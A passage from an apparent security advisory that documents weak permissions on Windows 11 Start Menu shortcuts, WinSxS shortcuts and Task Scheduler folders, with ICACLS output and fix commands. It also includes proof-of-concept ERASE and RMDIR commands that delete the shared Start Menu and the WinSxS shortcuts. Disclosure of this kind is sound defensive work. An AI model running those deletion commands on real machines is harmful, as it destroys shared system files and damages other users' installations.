S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\RecoveryDrive.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Registry Editor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Defender Firewall with Advanced Security.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)OUCH²: on this (typical) installation of Windows 11 25H2 the vulnerability even got worse – now multiple unprivileged users are able to remove the shared
Start Menucompletely!
(Optional) Clobber the shared Start Menu
:
IF DEFINED WHISPER ( ERASE /A:HS /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini" ERASE /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk" ) ELSE ( RMDIR /Q /S "%ProgramData%\Microsoft\Windows\Start Menu" )
(A;OICIIO;DTSD;;;S-1-5-21-‹digits›-‹digits›-‹digits›-1000)
for the primary local user account and the
superfluous
ACE
(A;OICIIO;DTSD;;;LA)
for the local Administrator account!
Logon to the first user account created during Windows
setup and start the Command Processor
Cmd.exe
elevated, then execute the following command lines:
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /Remove:g "%USERDOMAIN%\%USERNAME%" /Remove:g "%USERDOMAIN%\Administrator" /T ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini" /C /Q /Remove:g "%USERDOMAIN%\%USERNAME%" /Remove:g "%USERDOMAIN%\Administrator" /T ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk" /C /Q /Remove:g "%USERDOMAIN%\%USERNAME%" /Remove:g "%USERDOMAIN%\Administrator" /T
Successfully processed 112 files; Failed processing 0 files Successfully processed 11 files; Failed processing 0 files Successfully processed 90 files; Failed processing 0 files
%SystemRoot%\WinSxS\ is used as repository and
staging store for almost all components of Windows NT.
To protect its integrity only the (virtual) service
account
NT SERVICE\TrustedInstaller
with
security identifier
S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464
should have write and delete access there.
Due to braindead implementation of the
Component Based Servicing introduced with
Windows Vista, files from the repository are installed
via reflection
, i.e. as
hard links
instead of true copies – modifications of installed files, for
example shortcuts in the shared Start Menu
, therefore change
the repository.
Logon to one of the user accounts created during
Windows setup and start the
Command Processor
Cmd.exe
unelevated, then execute the following command
line:
ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /T | FINDSTR.EXE /L "%SystemRoot% (DE,DC)"
C:\Windows\WinSxS\amd64_eventviewersettings_31bf3856ad364e35_10.0.26100.1882_none_90964c57b3d34f63\Event Viewer.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_eventviewersettings_31bf3856ad364e35_10.0.26100.1_none_f1eb80676c3fbe87\Event Viewer.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_eventviewersettings_31bf3856ad364e35_10.0.26100.5074_none_90eba575b3937e62\Event Viewer.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-a..roblemstepsrecorder_31bf3856ad364e35_10.0.26100.4202_none_76c8e866faf07366\Steps Recorder.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-a..roblemstepsrecorder_31bf3856ad364e35_10.0.26100.5074_none_76e55e9afada1d4e\Steps Recorder.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.26100.4202_none_4abe321a9b7601be\Task Manager.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.26100.5074_none_4adaa84e9b5faba6\Task Manager.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-c..s-admin-compsvclink_31bf3856ad364e35_10.0.26100.1882_none_6e30c61a8a994728\Component Services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-c..s-admin-compsvclink_31bf3856ad364e35_10.0.26100.1_none_cf85fa2a4305b64c\Component Services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-c..s-admin-compsvclink_31bf3856ad364e35_10.0.26100.5074_none_6e861f388a597627\Component Services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-c..termanagementsnapin_31bf3856ad364e35_10.0.26100.1882_none_e6b4947c26772596\Computer Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-c..termanagementsnapin_31bf3856ad364e35_10.0.26100.5074_none_e709ed9a26375495\Computer Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-charmap_31bf3856ad364e35_10.0.26100.4202_none_8e3114995451d760\Character Map.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-charmap_31bf3856ad364e35_10.0.26100.5074_none_8e4d8acd543b8148\Character Map.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-cleanmgr_31bf3856ad364e35_10.0.26100.4202_none_091b8d9c0d8281ab\Disk Cleanup.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-cleanmgr_31bf3856ad364e35_10.0.26100.5074_none_093803d00d6c2b93\Disk Cleanup.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-defrag-adminui_31bf3856ad364e35_10.0.26100.1_none_9609b71ef8d18dee\dfrgui.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-defrag-adminui_31bf3856ad364e35_10.0.26100.3323_none_34e47df340420efa\dfrgui.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-defrag-adminui_31bf3856ad364e35_10.0.26100.5074_none_3509dc2d40254dc9\dfrgui.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-iscsi_initiator_ui_31bf3856ad364e35_10.0.26100.1882_none_73899f020c320a85\iSCSI Initiator.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-iscsi_initiator_ui_31bf3856ad364e35_10.0.26100.5074_none_73def8200bf23984\iSCSI Initiator.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.26100.1_none_41438fbea643a6b2\ODBC Data Sources (64-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.26100.3323_none_e01e5692edb427be\ODBC Data Sources (64-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.26100.5074_none_e043b4cced97668d\ODBC Data Sources (64-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-m..diagnostic-schedule_31bf3856ad364e35_10.0.26100.1882_none_2f75108d29d7afaa\Memory Diagnostics Tool.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-m..diagnostic-schedule_31bf3856ad364e35_10.0.26100.1_none_90ca449ce2441ece\Memory Diagnostics Tool.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-m..diagnostic-schedule_31bf3856ad364e35_10.0.26100.5074_none_2fca69ab2997dea9\Memory Diagnostics Tool.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-shortcut_31bf3856ad364e35_10.0.26100.1882_none_4a6fe694fdd588e7\Windows Media Player Legacy.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-shortcut_31bf3856ad364e35_10.0.26100.1_none_abc51aa4b641f80b\Windows Media Player Legacy.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-shortcut_31bf3856ad364e35_10.0.26100.5074_none_4ac53fb2fd95b7e6\Windows Media Player Legacy.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.26100.4202_none_765195be4db6c109\System Configuration.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.26100.5074_none_766e0bf24da06af1\System Configuration.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.26100.4202_none_47b3be11a9a4f9b0\System Information.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.26100.5074_none_47d03445a98ea398\System Information.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-p..erandprintui-pmcppc_31bf3856ad364e35_10.0.26100.4202_none_a73f992730a85600\Print Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-p..erandprintui-pmcppc_31bf3856ad364e35_10.0.26100.5074_none_a75c0f5b3091ffe8\Print Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.26100.4202_none_37e1156650eaa088\Performance Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.26100.4202_none_37e1156650eaa088\Resource Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.26100.5074_none_37fd8b9a50d44a70\Performance Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.26100.5074_none_37fd8b9a50d44a70\Resource Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-recoverydrive_31bf3856ad364e35_10.0.26100.4343_none_c46322c03ba8c055\RecoveryDrive.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-recoverydrive_31bf3856ad364e35_10.0.26100.5074_none_c4867e803b8dcf4f\RecoveryDrive.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.26100.4202_none_90060c9f8bcf570f\Registry Editor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.26100.5074_none_902282d38bb900f7\Registry Editor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-s..ment-policytools-ex_31bf3856ad364e35_10.0.26100.1882_none_f4fdc9eef135ca34\Security Configuration Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-s..ment-policytools-ex_31bf3856ad364e35_10.0.26100.1_none_5652fdfea9a23958\Security Configuration Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-s..ment-policytools-ex_31bf3856ad364e35_10.0.26100.5074_none_f553230cf0f5f933\Security Configuration Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_10.0.26100.1882_none_6b0256f4f5db1044\services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_10.0.26100.1_none_cc578b04ae477f68\services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_10.0.26100.5074_none_6b57b012f59b3f43\services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.26100.4202_none_e9b3a4cfd10e4076\Remote Desktop Connection.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.26100.5074_none_e9d01b03d0f7ea5e\Remote Desktop Connection.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_networking-mpssvc-shortcut_31bf3856ad364e35_10.0.26100.1882_none_20f5695abce558a4\Windows Defender Firewall with Advanced Security.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_networking-mpssvc-shortcut_31bf3856ad364e35_10.0.26100.1_none_824a9d6a7551c7c8\Windows Defender Firewall with Advanced Security.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_networking-mpssvc-shortcut_31bf3856ad364e35_10.0.26100.5074_none_214ac278bca587a3\Windows Defender Firewall with Advanced Security.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_taskschedulersettings_31bf3856ad364e35_10.0.26100.1882_none_e689781ab47d0fe7\Task Scheduler.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_taskschedulersettings_31bf3856ad364e35_10.0.26100.1_none_47deac2a6ce97f0b\Task Scheduler.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_taskschedulersettings_31bf3856ad364e35_10.0.26100.5074_none_e6ded138b43d3ee6\Task Scheduler.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\wow64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.26100.3624_none_ea527a59222d572d\ODBC Data Sources (32-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\wow64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.26100.5074_none_ea985f1f21f82888\ODBC Data Sources (32-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)OUCH: multiple unprivileged user accounts created during setup of this installation of Windows 11 25H2 are granted
DELETE and
FILE_DELETE_CHILD access to 60
shortcuts stored underneath %SystemRoot%\WinSxS\!
(Optional) Delete the shortcuts in the repository:
ERASE /F /Q /S "%SystemRoot%\WinSxS\*.lnk"
(A;OICIIO;DTSD;;;LA)
for the local Administrator account and
all dangerous
ACEs like
(A;OICIIO;DTSD;;;S-1-5-21-‹digits›-‹digits›-‹digits›-1000)
for the local user accounts from the shortcuts in the
repository.
Logon to the first user account created during Windows
setup and start the Command Processor
Cmd.exe
elevated, then execute the following command line:
ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /Remove:g "%USERDOMAIN%\Administrator /Remove:g "%USERDOMAIN%\%USERNAME%" /Remove:g "%USERDOMAIN%\‹account›" /Remove:g *S-1-5-21-‹digits›-‹digits›-‹digits›-1000 /Remove:g *S-1-5-21-‹digits›-‹digits›-‹digits›-… /T
Successfully processed … files; Failed processing 0 files
The MSKB article 939039 provides a description of the scheduled tasks in Windows Vista.
The documentation for the
Schtasks
command line utility shipped with Windows XP states in
its last Remarks
section:
The documentation for the Schtasks command line utility shipped with Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1 and Windows Server 2012 R2 states in its first
- The user must be a member of the Administrators group on the computer that the command affects.
Remarkssection:
Before Windows Vista Scheduled Tasks used the directory
- Permissions for schtasks
You must have permission to run the command. Any user can schedule a task on the local computer, and they can view and change the tasks that they scheduled. Members of the Administrators group can schedule, view, and change all tasks on the local computer.
%WINDIR%\Tasks\ for .job
files and its log file schedlgu.txt.
In Windows Vista and later versions of
Windows NT the
Task Scheduler
uses the directory %SystemRoot%\System32\Tasks\ –
on 64-bit editions of Windows NT also the directory
%SystemRoot%\SysWoW64\Tasks\ – for text
files in XML
format, but without file extension, and without proper protection:
since almost 19 (in words: nineteen) years
unprivileged users can overwrite and delete some of
them!
Logon to an arbitrary (unprivileged) standard user account and start
the Command Processor
Cmd.exe, then execute the
following command lines:
CACLS.EXE "%SystemRoot%\Tasks" /S ICACLS.EXE "%SystemRoot%\Tasks" DIR /A /S "%SystemRoot%\System32\Tasks" CACLS.EXE "%SystemRoot%\System32\Tasks" /S ICACLS.EXE "%SystemRoot%\System32\Tasks" DIR /A /S "%SystemRoot%\SysWoW64\Tasks" CACLS.EXE "%SystemRoot%\SysWoW64\Tasks" /S ICACLS.EXE "%SystemRoot%\SysWOW64\Tasks"Note: the command lines can be copied and pasted as block into a Command Processor window.
C:\windows\Tasks "D:PAI(A;;0x1200ab;;;AU)(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;FA;;;BA)(A;OICIIO;GA;;;CO)" C:\Windows\Tasks NT AUTHORITY\Authenticated Users:(RX,WD) BUILTIN\Administrators:(F) BUILTIN\Administrators:(OI)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(F) NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F) CREATOR OWNER:(OI)(CI)(IO)(F) Successfully processed 1 files; Failed processing 0 files Volume in drive C: has no label. Volume Serial Number is 1957-0427 File Not Found C:\windows\System32\Tasks "D:PAI(A;CI;FA;;;BA)(A;OI;0x1f019f;;;BA)(A;CI;FA;;;SY)(A;OI;0x1f019f;;;SY)(A;CI;FW;;;AU)(A;CI;FW;;;NS)(A;CI;FW;;;LS)(A;OICIIO;FA;;;CO)" C:\Windows\System32\Tasks BUILTIN\Administrators:(CI)(F) BUILTIN\Administrators:(OI)(R,W,D,WDAC,WO) NT AUTHORITY\SYSTEM:(CI)(F) NT AUTHORITY\SYSTEM:(OI)(R,W,D,WDAC,WO) NT AUTHORITY\Authenticated Users:(CI)(W,Rc) NT AUTHORITY\NETWORK SERVICE:(CI)(W,Rc) NT AUTHORITY\LOCAL SERVICE:(CI)(W,Rc) 